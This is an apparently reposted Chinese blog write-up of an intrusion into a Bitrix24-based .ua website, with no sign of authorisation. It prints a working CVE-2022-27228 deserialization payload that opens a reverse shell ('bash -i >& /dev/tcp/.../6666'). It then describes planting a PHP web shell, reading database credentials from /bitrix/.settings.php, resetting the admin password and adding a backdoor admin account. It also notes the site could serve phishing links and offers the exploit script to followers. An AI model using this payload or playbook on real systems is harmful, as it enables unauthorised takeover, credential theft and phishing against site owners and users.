记一次渗透测试某靶标 (1)

admin 2024年9月9日01:34:32评论17 views字数 2152阅读7分10秒阅读模式

点击上方蓝字关注我们 并设为星标

0x00 前言

今天的主角:https://*****.*****.ua/

记一次渗透测试某靶标 (1)

0x01 外网打点

先查询一下服务器开放的端口 我都去试过了 没有任何可利用的信息

记一次渗透测试某靶标 (1)

通过浏览器插件找到某处js里似乎是有该网站的特征信息 bitrix

记一次渗透测试某靶标 (1)

去google上查询了发现是Ru的一套cms系统 bitrix24 去查阅相关漏洞 发现了CVE-2022-27228.

记一次渗透测试某靶标 (1)

记一次渗透测试某靶标 (1)

这个漏洞cvss评分挺高 应该是高危洞 直接找poc测一下 发现确实存在漏洞.(找了很久 才从github上找到 不过现在仓库已经无了)

记一次渗透测试某靶标 (1)

直接通过利用脚本反弹Shell后写PHPshell 然后连接.

<?php __HALT_COMPILER(); ?>f             0  O:25:"BitrixMainEntityResult":2:{s:12:" * isSuccess";b:0;s:9:" * errors";O:36:"BitrixMainUserConsentDataProvider":1:{s:7:" * data";a:2:{i:0;O:26:"CAdminDraggableBlockEngine":2:{s:10:" * engines";a:1:{i:0;a:1:{s:5:"check";s:6:"system";}}s:7:" * args";s:20:"bash -i >& /dev/tcp/8.***.**.**/6666 0>&1";}i:1;s:5:"check";}}}   test.txt   炦c   千??      text緲?坈+rO 6?]]?'?   GBMB

记一次渗透测试某靶标 (1)

https://*****.*****/***.php

记一次渗透测试某靶标 (1)

查看了下它的IP 192.168.105.55 确实是在内网之中,那就有了进一步操作渗透内网的可能记一次渗透测试某靶标 (1)

数据库文件是存在 /bitrix/.settings.php 中, so 我们直接去查找.

记一次渗透测试某靶标 (1)

<?phpreturn array (  'utf_mode' =>   array (    'value' => false,    'readonly' => true,  ),  'cache_flags' =>   array (    'value' =>     array (      'config_options' => 3600.0,      'site_domain' => 3600.0,    ),    'readonly' => false,  ),  'cookies' =>   array (    'value' =>     array (      'secure' => false,      'http_only' => true,    ),    'readonly' => false,  ),  'exception_handling' =>   array (    'value' =>     array (      'debug' => true,      'handled_errors_types' => 4437,      'exception_errors_types' => 4437,      'ignore_silence' => false,      'assertion_throws_exception' => true,      'assertion_error_type' => 256,      'log' => NULL,    ),    'readonly' => false,  ),  'connections' =>   array (    'value' =>     array (      'default' =>       array (        'className' => '\Bitrix\Main\DB\MysqliConnection',        'host' => 'localhost',        'database' => 'c8aritmolog',        'login' => '****************',        'password' => '*****************',        'options' => 2.0,      ),    ),    'readonly' => true,  ),  'crypto' =>   array (    'value' =>     array (      'crypto_key' => '61ffea2a5e26b50************',    ),    'readonly' => true,  ),);

OK. 让我们连接上数据库:

记一次渗透测试某靶标 (1)

查看用户表 B_User 发现有非常多的用户

记一次渗透测试某靶标 (1)

admin的密码Cmd5解不开 于是直接利用官方程序重置Admin的Password.

记一次渗透测试某靶标 (1)

记一次渗透测试某靶标 (1)

发现页面回显 1 说明成功重置了Admin的密码为 B*******456

访问 https://*****.*****/bitrix/admin/#authorize 输入重置后的账密 成功进入后台.

记一次渗透测试某靶标 (1)

访问 https://*****.******/bitrix/admin/user_admin.php?lang=en 进入用户管理 发现还有人往里边Sql注入......

记一次渗透测试某靶标 (1)

创建管理用户 Bi*******8rt|******* 并将admin的密码改回

记一次渗透测试某靶标 (1)

至此 完全控制该站点 可修改网站任意参数,可进行部署恶意链接 钓鱼等操作.

记一次渗透测试某靶标 (1)

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转,RCE

关注下方公众号,发送 240908获取漏洞脚本

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):记一次渗透测试某靶标 (1)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月9日01:34:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次渗透测试某靶标 (1)https://cn-sec.com/archives/3144142.html

发表评论

匿名网友 填写信息